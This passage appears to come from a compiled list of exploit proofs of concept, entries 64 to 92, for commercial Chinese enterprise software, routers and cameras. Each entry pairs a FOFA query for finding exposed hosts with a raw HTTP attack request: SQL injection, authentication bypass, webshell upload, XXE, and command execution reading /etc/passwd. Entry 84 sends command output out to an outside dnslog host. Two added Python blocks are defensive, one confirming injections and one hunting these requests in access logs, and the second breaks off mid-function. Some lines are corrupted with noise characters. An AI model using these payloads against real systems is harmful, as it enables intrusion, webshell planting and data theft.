path=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A

+ e8 @! t- U" w! y64. 捷诚管理信息系统CWSFinanceCommon SQL注入+ x1 t( ~: t- {" Y' u" T: g$ D; ?
FOFA:body="/Scripts/EnjoyMsg.js"
; f1 y' o3 R2 S! PPOST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.15 v, P4 k9 s. N8 J3 e5 o' Y
Host: 192.168.86.128:9001
$ s* E8 q5 \/ f3 m6 xUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
# n- i* M0 O# _Connection: close6 J9 K0 g* C) ]2 ?
Content-Length: 369
4 J3 \  c: ~1 V, r5 TAccept: */*
* ^5 C& V( J7 n. j, mAccept-Language: en2 Z1 q& v* w2 g- c
Content-Type: text/xml; charset=utf-8: A% ]  t6 y. O  A3 B; P3 B
Accept-Encoding: gzip" U, q) B2 W/ h; b2 l& d9 a
2 P9 O# o5 F* R5 i0 T% f7 a' e
<?xml version="1.0" encoding="utf-8"?>1 X; P' Y5 d" L: z. D
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
! e4 ?4 p! S  P+ q2 {: y<soap:Body>/ w) P- o' H* z
    <GetOSpById xmlns="http://tempuri.org/">, i- i6 p6 Q' h. T
      <sId>1';waitfor delay '0:0:5'--+</sId>
, w- x, z5 a, T: [1 L2 {    </GetOSpById>0 d! M$ C. d$ k4 [
  </soap:Body>5 p( w& p$ I* \
</soap:Envelope>
5 F& @3 [: M2 H: i1 r, d$ z! l. T! q; j# x! I6 T. l- y8 b; V% X; M  ]
4 x9 Z, o% k8 e
65. Youkate (优卡特) Lianaiyun (脸爱云) face-recognition smart management platform 1.0.55.0.0.1 authorization bypass
FOFA: title="欢迎使用脸爱云 一脸通智慧管理平台"
The addOperators function is reachable without a session; a 200 response means the account test123456 / 123456 was created.
POST /SystemMng.ashx HTTP/1.1
Host:
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Accept-Language: en
Content-Length: 174

operatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators

66. Wanhu (万户) ezOFFICE collaborative management platform SendFileCheckTemplateEdit SQL injection
FOFA: app="万户ezOFFICE协同管理平台"

GET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

The vulnerability is confirmed when lines 42 and 43 of the response contain the string 6cfe798ba8e5b85feb50164c59f4bec9 (the hash the UNION selects into the first column).

67. Wanhu ezOFFICE wpsservlet arbitrary file upload
FOFA: app="万户网络-ezOFFICE"
newdocId and the multipart filename give the name of the written file, dir is the directory it is written to (relative, so it can traverse), and fileType is the extension.
POST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Content-Length: 173
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Connection: close
Content-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp
DNT: 1
Upgrade-Insecure-Requests: 1

--ufuadpxathqvxfqnuyuqaozvseiueerp
Content-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"

<% out.print("sasdfghjkj");%>
--ufuadpxathqvxfqnuyuqaozvseiueerp--

The uploaded file is then reachable at /defaultroot/platform/portal/layout/apoxkq.jsp

68. Wanhu ezOFFICE wf_printnum.jsp SQL injection
FOFA: app="万户ezOFFICE协同管理平台"
Time-based (about 5 s). The ";.js" suffix is the Tomcat path-parameter trick: servlet mapping ignores everything after the ";", so the JSP still runs, while an authentication filter that checks the raw URI suffix sees a static .js resource and lets the request through.
GET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: {{host}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

69. Wanhu ezOFFICE contract_gd.jsp SQL injection
FOFA: app="万户ezOFFICE协同管理平台"
Time-based, same ";.js" authentication bypass as entry 68; the injection point is gd_startUserCode.
GET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

70. Wanhu ezEIP success.aspx command execution
FOFA: app="万户网络-ezEIP"
__VIEWSTATE deserialization. The SID header carries the command the serialized payload executes, base64-encoded: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk= decodes to type C:\Windows\win.ini.
POST /member/success.aspx HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
SID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=
Content-Type: application/x-www-form-urlencoded
TYPE: C
Content-Length: 16702

__VIEWSTATE=PAYLOAD

71. Bangyong (邦永) PM2 project management system Global_UserLogin.aspx SQL injection
FOFA: body="PM2项目管理系统BS版增强工具.zip"
Time-based (about 5 s) through the accId parameter of the login page, so no credentials are needed.
GET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Connection: close
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Upgrade-Insecure-Requests: 1

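The MSSQL entries in this section confirm injection in one of two ways: an error-based marker, where the hex of hashbytes('MD5', seed) must turn up in the response (58, 66), or a blind waitfor delay that is only visible as latency (64, 68, 69, 71). The helper below is an added example written for this page, not code from the original post or from any of the vendors named. It computes the marker for a seed of your own choosing (the public seeds 123456 and 102103122 are in every WAF signature set, so a reproduction should use its own), checks a response body for it, and judges a timing result against a baseline measured on the same host rather than against a fixed threshold, which is what stops a slow but unaffected host from being reported as injectable. md5_marker('102103122') also lets you check the digest entry 66 quotes. The response text and timings embedded in the block are constructed for the demonstration.

```python
"""Confirmation helpers for the MSSQL injection entries in this section.

Added example (not from the original post). Nothing here sends traffic;
feed it the response body and the request timings you measured yourself.
"""
import hashlib
import statistics


def md5_marker(seed):
    """Hex digest that sys.fn_varbintohexstr / fn_sqlvarbasetostr show for
    hashbytes('MD5', seed), without the 0x prefix those functions prepend."""
    return hashlib.md5(seed.encode("utf-8")).hexdigest()


def marker_present(body, seed):
    """True if the response echoes the marker for `seed` (hex case ignored).
    A 32-hex-char digest will not appear by accident, which is why the entries
    select a hash instead of a literal that reflected input could also produce."""
    return md5_marker(seed) in body.lower()


def delay_confirmed(baseline_secs, injected_secs, delay_secs, ratio=0.8):
    """Judge a waitfor delay probe against a baseline measured on the same host.

    baseline_secs: timings of the request with a harmless parameter value.
    injected_secs: timings with the waitfor delay payload.
    Confirmed when the injected median exceeds the baseline median by at
    least `ratio` of the requested delay, so a slow host is not a false hit.
    """
    return (statistics.median(injected_secs) - statistics.median(baseline_secs)
            >= ratio * delay_secs)


# Constructed demonstration data (not captured from any host). The body has the
# shape of the SQL Server conversion error that entry 58's payload provokes.
DEMO_BODY = ("Conversion failed when converting the varchar value "
             "'0xE10ADC3949BA59ABBE56E057F20F883E' to data type int.")
DEMO_BASELINE = [0.21, 0.19, 0.24]
DEMO_INJECTED = [5.23, 5.31, 5.19]

if __name__ == "__main__":
    print(md5_marker("123456"))                                # e10adc3949ba59abbe56e057f20f883e
    print(marker_present(DEMO_BODY, "123456"))                 # True
    print(delay_confirmed(DEMO_BASELINE, DEMO_INJECTED, 5))    # True
    print(delay_confirmed(DEMO_BASELINE, [0.9, 1.1, 0.8], 5))  # False
```

Take at least three baseline and three injected samples; the median makes one retransmit or GC pause irrelevant, whereas a single measurement against a fixed 5-second cut-off is exactly how slow WAF-fronted hosts end up in a report as vulnerable.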
72. Seeyon (致远) OA getAjaxDataServlet XXE
FOFA: app="致远互联-OA"
xmlValue is parsed with external entities enabled: it decodes to a document whose DOCTYPE declares xxe as file:///c:/windows/win.ini and whose VALUE field expands that entity.
POST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.1
Host: 192.168.40.131:8099
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 583
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

S=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%5D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E

73. GeoServer wms remote code execution
FOFA: icon_hash="97540678"
POST /geoserver/wms HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Content-Length: 1981
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/xml
SL-CE-SUID: 3

PAYLOAD

74. Seeyon M3-Server 6_1sp1 deserialization RCE
FOFA: title="M3-Server"
PAYLOAD

75. Telesquare TLR-2005Ksh router admin.cgi RCE
FOFA: app="TELESQUARE-TLR-2005KSH"
The time parameter of setSyncTimeHost is passed to a shell, so a backtick substitution runs; the output is redirected into a file under cgi-bin and fetched with the second request.
GET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

GET /cgi-bin/test28256.txt HTTP/1.1
Host: x.x.x.x

" V" p1 \4 e; s$ E3 Y+ I" w76. 新开普掌上校园服务管理平台service.action远程命令执行. |1 l7 j; q0 R; M) s. K. w+ C. R
FOFA:title="掌上校园服务管理平台"
' Y" _( T+ C: w3 `% X/ {- L0 [POST /service_transport/service.action HTTP/1.1. B/ \! i( c2 o  i6 r) G3 L. s2 g
Host: x.x.x.x
( `1 h! d" Z. P( F( I$ y! T# \2 }0 AUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0* V- ~( `! a) J$ L
Connection: close2 ]" J% n, i6 [' r/ _6 Z0 X
Content-Length: 211( i7 z& ^( {. a1 C8 O8 E7 ?
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8$ a+ m# v, [8 \% m7 \& V
Accept-Encoding: gzip, deflate
& n2 \7 @. E/ T$ l7 |; \Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
1 D+ n6 D& Q4 D) |" G* a) `Cookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A48 g; ^! H: K, e8 H3 }# A
Upgrade-Insecure-Requests: 1
% K! G8 E, L3 A0 V, ?7 i/ D8 X) Y  }% H) e+ t
{/ G+ O8 I* |( L& Y  O3 }2 _4 y
"command": "GetFZinfo",) z" S* b& M, }4 Y+ `5 r0 ]
  "UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"$ C6 G& S# I# W. C
  ?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}"
6 N# I2 F2 T; t3 V}& J& e/ o  a* _# [& A# A

! k8 C" _6 {" \- F" f' c" d5 |+ w& q4 @4 B) P1 l. E7 x/ z
GET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.15 P( y3 }- v+ z- @5 X( w: R8 `
Host: x.x.x.x; o7 A! {8 Y4 T9 ?9 w; Z8 X; R  c
2 }" L! {. C. A( L& P
% V0 r4 z9 F, S# P
' g* Y0 u! g2 C& l5 `
77. F22 apparel management software UploadHandler.ashx arbitrary file upload
FOFA: body="F22WEB登陆"
The bundled CuteEditor upload handler accepts any extension; folder picks the target directory.
POST /CuteSoft_Client/UploadHandler.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Connection: close
Content-Length: 433
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix

------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="folder"

/upload/udplog
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Filedata"; filename="1.aspx"
Content-Type: application/octet-stream

hello1234567
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Upload"

Submit Query
------------398jnjVTTlDVXHlE7yYnfwBoix--

78. pkpmbs construction quality supervision system FileUpload.ashx file upload
FOFA: icon_hash="2001627082"
The target field chooses the directory; the file is then served from the same path.
POST /Platform/System/FileUpload.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 336
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l

------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt"
Content-Type: image/png

YsOxWxSvj1KyZow1PTsh98fdu6l
------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="target"

/Applications/SkillDevelopAndEHS/
------YsOxWxSvj1KyZow1PTsh98fdu6l--

GET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.1
Host: x.x.x.x

79. BYTEVALUE (百为) traffic-control router remote command execution
FOFA: BYTEVALUE 智能流控路由器
The path parameter is handed to a shell; a leading pipe runs the command and its output is returned.
GET /goform/webRead/open/?path=|id HTTP/1.1
Host: IP
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

80. Superdata (速达) Tianyao software DesignReportSave.jsp arbitrary file upload
FOFA: app="速达软件-公司产品"
The request body is written to the path given in report, which is not confined to the report directory; the second request executes the dropped JSP.
POST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 27
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/octet-stream
Upgrade-Insecure-Requests: 1

<% out.print("oessqeonylzaf");%>

GET /xykqmfxpoas.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

81. Uniview (宇视) video surveillance main-cgi password disclosure
FOFA: app="uniview-视频监控"
An unauthenticated cmd 255 call (empty user name, login handle -1) returns configuration that includes account passwords.
GET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

82. Sifudi (思福迪) LOGBASE operations security management system test_qrcode_b remote command execution
FOFA: app="思福迪-LOGBASE"
The z2 parameter is interpolated into a shell command; the quoted "|id;" breaks out of it.
POST /bhost/test_qrcode_b HTTP/1.1
Host: BaseURL
User-Agent: Go-http-client/1.1
Content-Length: 23
Accept-Encoding: gzip
Connection: close
Content-Type: application/x-www-form-urlencoded
Referer: BaseURL

z1=1&z2="|id;"&z3=bhost

83. JeecgBoot testConnection remote command execution
FOFA: title=="JeecgBoot 企业级低代码平台"
The command is supplied in the Cmd header; the JSON body (elided) is the connection definition that triggers it.

POST /jmreport/testConnection HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 8881
Accept-Encoding: gzip
Cmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO"
Content-Type: application/json

PAYLOAD

84. Jeecg-Boot JimuReport queryFieldBySql template injection
FOFA: title=="JeecgBoot 企业级低代码平台"
The sql field is rendered through FreeMarker before it is used, so the same Execute trick as entry 76 runs a command; here the result of whoami is exfiltrated as a DNS label.

POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: curl/7.88.1
Content-Length: 156
Accept: */*
Connection: close
Content-Type: application/json
Accept-Encoding: gzip

{
  "sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami`\")}",
  "type": "0"
}

85. SysAid On-premise < 23.3.36 remote code execution
CVE-2023-47246
FOFA: body="sysaid-logo-dark-green.png"
The exploit request is below; the path traversal in accountId places the uploaded content under tomcat/webapps, dropping a Godzilla webshell.
POST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/octet-stream
Accept-Encoding: gzip

PAYLOAD

Webshell URL: http://x.x.x.x/userfiles/index.jsp

86. Tosei (Japan) self-service laundry machine RCE
FOFA: body="tosei_login_check.php"
The host field of the ping form is passed to a shell; a newline (%0a) terminates the ping command and ${IFS} stands in for the space that the filter strips.
POST /cgi-bin/network_test.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Connection: close
Content-Length: 44
Accept: */*
Accept-Encoding: gzip
Accept-Language: en
Content-Type: application/x-www-form-urlencoded

host=%0acat${IFS}/etc/passwd%0a&command=ping

87. DBAPPSecurity (安恒) Mingyu (明御) security gateway aaa_local_web_preview file upload
FOFA: title="明御安全网关"
The suffix parameter is appended to the stored file name without normalisation, so a traversal sequence in it chooses both the directory and the extension.
POST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.1
Host: X.X.X.X
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 198
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd

--qqobiandqgawlxodfiisporjwravxtvd
Content-Disposition: form-data; name="123"; filename="9B9Ccd.php"
Content-Type: text/plain

2ZqGNnsjzzU2GBBPyd8AIA7QlDq
--qqobiandqgawlxodfiisporjwravxtvd--

Then fetch /jfhatuwe.php

88. DBAPPSecurity Mingyu security gateway aaa_portal_auth_config_reset remote command execution
FOFA: title="明御安全网关"
The type parameter reaches a shell; the newline-wrapped echo appends a PHP file to the web UI directory (decoded: echo '<?php echo "assdwdmpidmsbzoabahpjhnokiduw"; phpinfo(); ?>' >> /usr/local/webui/txzfsrur.php).
GET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close

Then fetch the written file: /txzfsrur.php

89. Seeyon FE collaborative office platform editflow_manager SQL injection
FOFA: title="FE协作办公平台" || body="li_plugins_download"
The request path is editflow_manager.jsp with the p percent-encoded (.js%70), which slips past a suffix-based access check. A vulnerable host reflects 24642 (the result of 111*222) in the response.
POST /sysform/003/editflow_manager.js%70 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 41
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

option=2&GUID=-1'+union+select+111*222--+

90. Hikvision IP network intercom/broadcast system 3.0.3_20201113_RELEASE remote command execution
FOFA: icon_hash="-1830859634"
jsondata[ip] is passed to the system's ping helper without validation, so any command runs in its place (ipconfig here, the product runs on Windows).
POST /php/ping.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Content-Length: 51
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest

jsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig

91. Hikvision integrated security management platform orgManage/v1/orgs/download arbitrary file read
FOFA: title="综合安防管理平台"
The "..;/" segment is the Tomcat path-parameter trick: the gateway's authentication rule sees a request under /center/api/task/, while the servlet container normalises the path to /orgManage/v1/orgs/download. fileName is then used without confinement.
GET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

92. Hikvision operations management center session command execution
Fastjson deserialization; the command to run is taken from the Testcmd header, the JSON body (elided) carries the gadget.
hunter: web.icon=="e05b47d5ce11d2f4182a964255870b76"
POST /center/api/session HTTP/1.1
Host:
Accept: application/json, text/plain, */*
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: application/json;charset=UTF-8
X-Language-Type: zh_CN
Testcmd: echo test
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Accept-Language: zh-CN,zh;q=0.9
Content-Length: 5778

PAYLOAD

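For the defenders this post is addressed to, the raw requests above translate directly into hunting rules over web-server access logs. The script below is an added example written for this page, not code from the original post or from any vendor; it assumes Nginx/Apache combined-format logs and encodes the endpoints and parameter shapes of the entries in this section (including the two SecGate 3600 uploads that follow) as rules. It undoes the log escaping and URL encoding, strips Tomcat ';' path parameters so that ';.js', '.js%70' and '..;/' (entries 68, 69, 89, 91) land on the real servlet name, decodes the base64 sql= statement of entry 60, and adds product-independent rules for waitfor delay, newline command injection and traversal. Entries whose payload travels in a POST body can only be matched by path, and those hits are marked as indicators to be confirmed from WAF or application logs. The sample log lines are constructed for the demonstration.

```python
"""Hunt for the request patterns of entries 57-94 in web-server access logs.
Added example for defenders (not from the original post or any vendor).
Assumes combined-format logs; the SAMPLE_LOG lines below are constructed."""
import base64
import binascii
import re
from urllib.parse import unquote

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
                    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3})')

# (rule, regex over the normalized lowercase path, regex over the decoded query).
# A None query regex means the payload travels in a POST body, which an access
# log never records, so a path hit is only an indicator to confirm elsewhere.
ENDPOINT_RULES = [
    ("Chanjet T+ UFAQD SQLi (57/58)", r"^/tplus/ufaqd/(keyedit|keyinfolist)\.aspx$", r"'|waitfor|hashbytes|select"),
    ("Byzoro Smart SQL export (60)", r"^/importexport\.php$", r"type=exportexcelbysql"),
    ("IP-guard view.php command injection (62)", r"/flexpaper/php/view\.php$", r"page=\|\|"),
    ("Wanhu ezOFFICE JSP SQLi (66/68/69)", r"/(sendfilechecktemplateedit|wf_printnum|contract_gd)\.jsp$", r"'|waitfor|union"),
    ("Telesquare admin.cgi command injection (75)", r"^/cgi-bin/admin\.cgi$", r"`"),
    ("BYTEVALUE webRead/open command injection (79)", r"^/goform/webread/open/?$", r"path=\|"),
    ("Superdata DesignReportSave.jsp upload (80)", r"^/report/designreportsave\.jsp$", r"report=\.\./"),
    ("Uniview main-cgi credential leak (81)", r"^/cgi-bin/main-cgi$", r'"cmd":255'),
    ("JimuReport testConnection/queryFieldBySql (83/84)", r"/jmreport/(testconnection|queryfieldbysql)$", None),
    ("SysAid userentry traversal (85)", r"^/userentry$", r"accountid=\.\./"),
    ("Tosei network_test.php RCE (86)", r"^/cgi-bin/network_test\.php$", None),
    ("Mingyu gateway webui upload/RCE (87/88)", r"^/webui/?$", r"g=aaa_(local_web_preview|portal_auth_config_reset)"),
    ("Hikvision orgs/download traversal (91)", r"/orgmanage/v1/orgs/download$", r"filename=\.\./"),
    ("SecGate 3600 import_save upload (93/94)", r"^/$", r"g=(app_av|obj_area)_import_save"),
]
COMPILED = [(n, re.compile(p), re.compile(q, re.I) if q else None) for n, p, q in ENDPOINT_RULES]

# Product-independent shapes that several entries rely on.
GENERIC_RULES = [
    ("MSSQL time-based SQLi", re.compile(r"waitfor\s+delay", re.I)),
    ("newline command injection", re.compile(r"\n")),
    ("path traversal in query", re.compile(r"(^|[=/])\.\./")),
]


def normalize(target):
    """Undo log escaping (Nginx \\x22, Apache \\") and URL encoding, then drop ';...'
    path parameters: '/..;/' becomes '/../' and 'x.jsp;.js' becomes 'x.jsp'."""
    decoded = unquote(target.replace("\\x22", '"').replace('\\"', '"'))
    path, _, query = decoded.partition("?")
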